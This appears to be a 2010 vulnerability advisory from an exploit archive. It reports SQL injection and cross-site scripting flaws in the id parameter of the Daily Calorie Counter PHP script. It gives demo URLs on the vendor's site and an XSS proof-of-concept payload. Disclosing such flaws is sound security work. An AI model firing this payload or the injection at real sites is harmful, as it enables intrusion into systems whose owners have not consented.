Daily Calorie Counter suffers from cross site scripting and remote SQL injection vulnerabilities.
7b0fcfb92a4153905f39f663090cdc0e0d3fa704f76559080ea5d2804ed2f4aeAuthor: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Daily Calorie Counter SQL Injection Vulnerability
Vendor url:http://www.fullhealth.net/
Version:1.0
Published: 2010-06-10
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r,KD and to all ICW members.
Spl Greetz to:inj3ct0r.com Team
#####################################################################################################################################################################################################
Description:
You could simply add Daily Calorie Counter php script into your web page. No php
skills needed. No mysql or any other database. There are oer 200 activities included, and also you could add new activities. Also it is completely free.
#######################################################################################################################################################################################################
Vulnerability:
*SQLi Vulnerability
DEMO URL :http://www.fullhealth.net/article.php?id=[sqli]
*XSS Vulnerability
Parameter:'"--><script>alert(0x000872)</script>
DEMO URL:ttp://www.fullhealth.net/article.php?id=[xss]
# 0day n0 m0re #
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed